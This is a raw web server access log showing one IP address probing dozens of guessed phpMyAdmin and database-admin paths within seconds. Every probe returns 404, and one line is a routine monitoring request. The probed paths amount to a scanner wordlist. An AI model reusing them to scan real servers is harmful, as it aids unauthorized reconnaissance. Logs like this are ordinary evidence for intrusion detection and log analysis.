125.72.69.122 - - [04/Feb/2020:16:14:35 +0100] "GET /phpMyAdmina/index.php HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:35 +0100] "GET /phpMydmin/index.php HTTP/1.1" 404 324 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:36 +0100] "GET /phpMyAdmins/index.php HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:36 +0100] "GET /phpMyAdmin._/index.php HTTP/1.1" 404 327 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:36 +0100] "GET /phpMyAdmin._2/index.php HTTP/1.1" 404 328 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:36 +0100] "GET /phpmyadmin2222/index.php HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:36 +0100] "GET /phpMyAdmin333/index.php HTTP/1.1" 404 328 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:37 +0100] "GET /phpmyadmin3333/index.php HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:38 +0100] "GET /php2MyAdmin/index.php HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:40 +0100] "GET /phpiMyAdmin/index.php HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:40 +0100] "GET /phpNyAdmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:40 +0100] "GET /1/index.php HTTP/1.1" 404 316 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:41 +0100] "GET /download/index.php HTTP/1.1" 404 323 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:41 +0100] "GET /phpMyAdmin_111/index.php HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
212.91.246.72 - - [04/Feb/2020:16:14:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
125.72.69.122 - - [04/Feb/2020:16:14:41 +0100] "GET /phpmadmin/index.php HTTP/1.1" 404 324 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:42 +0100] "GET /321/index.php HTTP/1.1" 404 318 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:42 +0100] "GET /123131/index.php HTTP/1.1" 404 321 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:42 +0100] "GET /phpMyAdminn/index.php HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:42 +0100] "GET /phpMyAdminhf/index.php HTTP/1.1" 404 327 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:42 +0100] "GET /sbb/index.php HTTP/1.1" 404 318 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:44 +0100] "GET /WWW/phpMyAdmin/index.php HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:49 +0100] "GET /phpMyAdmln/index.php HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:50 +0100] "GET /phpMyAdmin_ai/index.php HTTP/1.1" 404 328 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:50 +0100] "GET /__phpMyAdmin/index.php HTTP/1.1" 404 327 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:50 +0100] "GET /program/index.php HTTP/1.1" 404 322 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:50 +0100] "GET /shopdb/index.php HTTP/1.1" 404 321 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:50 +0100] "GET /phppma/index.php HTTP/1.1" 404 321 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:51 +0100] "GET /phpmy/index.php HTTP/1.1" 404 320 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:51 +0100] "GET /mysql/admin/index.php HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:51 +0100] "GET /mysql/dbadmin/index.php HTTP/1.1" 404 328 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
